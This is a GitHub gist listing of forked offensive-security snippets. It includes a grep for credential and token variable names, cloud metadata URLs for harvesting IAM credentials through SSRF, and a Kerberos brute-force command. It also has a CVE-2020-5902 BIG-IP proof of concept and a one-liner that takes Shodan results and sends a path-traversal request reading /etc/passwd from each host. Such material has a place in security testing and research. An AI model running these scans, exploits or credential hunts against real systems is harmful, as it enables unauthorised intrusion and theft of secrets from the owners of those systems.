Skip to content

Instantly share code, notes, and snippets.

Avatar

Never Mind secfb

View GitHub Profile
View resources.md
View secrets.sh
strings -f -e s * | grep -i 'BROWSER_STACK_ACCESS_KEY=\|BROWSER_STACK_USERNAME=\|browserConnectionEnabled=\|BROWSERSTACK_ACCESS_KEY=\|CHROME_CLIENT_SECRET=\|CHROME_EXTENSION_ID=\|CHROME_REFRESH_TOKEN=\|CI_DEPLOY_PASSWORD=\|CI_DEPLOY_USER=\|CLOUDAMQP_URL=\|CLOUDANT_APPLIANCE_DATABASE=\|CLOUDANT_ARCHIVED_DATABASE=\|CLOUDANT_AUDITED_DATABASE=\|CLOUDANT_ORDER_DATABASE=\|CLOUDANT_PARSED_DATABASE=\|CLOUDANT_PASSWORD=\|CLOUDANT_PROCESSED_DATABASE=\|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN=\|CONTENTFUL_TEST_ORG_CMA_TOKEN=\|CONTENTFUL_V2_ACCESS_TOKEN=\|-DSELION_BROWSER_RUN_HEADLESS=\|-DSELION_DOWNLOAD_DEPENDENCIES=\|-DSELION_SELENIUM_RUN_LOCALLY=\|ELASTICSEARCH_PASSWORD=\|ELASTICSEARCH_USERNAME=\|EMAIL_NOTIFICATION=\|ENCRYPTION_PASSWORD=\|END_USER_PASSWORD=\|FBTOOLS_TARGET_PROJECT=\|FDfLgJkS3bKAdAU24AS5X8lmHUJB94=\|FEEDBACK_EMAIL_RECIPIENT=\|FEEDBACK_EMAIL_SENDER=\|FIREBASE_PROJECT_DEVELOP=\|FIREBASE_PROJECT_ID=\|FIREBASE_PROJECT=\|FIREBASE_SERVICE_ACCOUNT=\|FIREBASE_TOKEN=\|GH_NAME=\|GH_NEXT_OAUTH_CLIENT_ID=\|GH_NEXT_OAU
@secfb
secfb / content-types.txt
Created Jul 26, 2020 — forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
View content-types.txt
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types
application/1d-interleaved-parityfec
application/3gpdash-qoe-report+xml
application/3gpp-ims+xml
application/a2l
application/activemessage
application/alto-costmap+json
application/alto-costmapfilter+json
application/alto-directory+json
@secfb
secfb / cloud_metadata.txt
Created Jul 26, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@secfb
secfb / Unique wayback url
Created Jul 26, 2020 — forked from dubey-amit/Unique wayback url
Get all the Wayback endpoints to compare it with your Burp crawled URLs & probe all the unique endpoints.
View Unique wayback url
cat urls | unfurl -u format %s://%d%p > unique && sort -uo unique unique && cat unique | unfurl -u domains | waybackurls | unfurl -u format %s://%d%p > wayurl && sort -uo wayurl wayurl | comm -1 -3 unique wayurl > final && rm urls && rm unique && rm wayurl && httpx -l final --status-code -silent --content-length | grep -i 200
@secfb
secfb / kerberos_attacks_cheatsheet.md
Created Jul 18, 2020 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@secfb
secfb / CVE-2020-5902.md
Created Jul 7, 2020 — forked from cihanmehmet/CVE-2020-5902.md
BIGIP CVE-2020-5902 Exploit POC
View CVE-2020-5902.md

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@secfb
secfb / rce.sh
Created Jul 5, 2020 — forked from Mad-robot/rce.sh
Shodan Big Ip RCE
View rce.sh
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
@secfb
secfb / fuzz.txt
Created Jul 3, 2020 — forked from m4ll0k/fuzz.txt
fuzz wordlist
View fuzz.txt
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
@secfb
secfb / foxyproxyBB.json
Created Jun 30, 2020 — forked from 0xatul/foxyproxyBB.json
firefox foxy proxy settings for BB stuff
View foxyproxyBB.json
{
"84kr3q1592995213323": {
"type": 1,
"color": "#cc883a",
"title": "Burp",
"active": true,
"address": "127.0.0.1",
"port": 8080,
"proxyDNS": false,
"username": "",
You can’t perform that action at this time.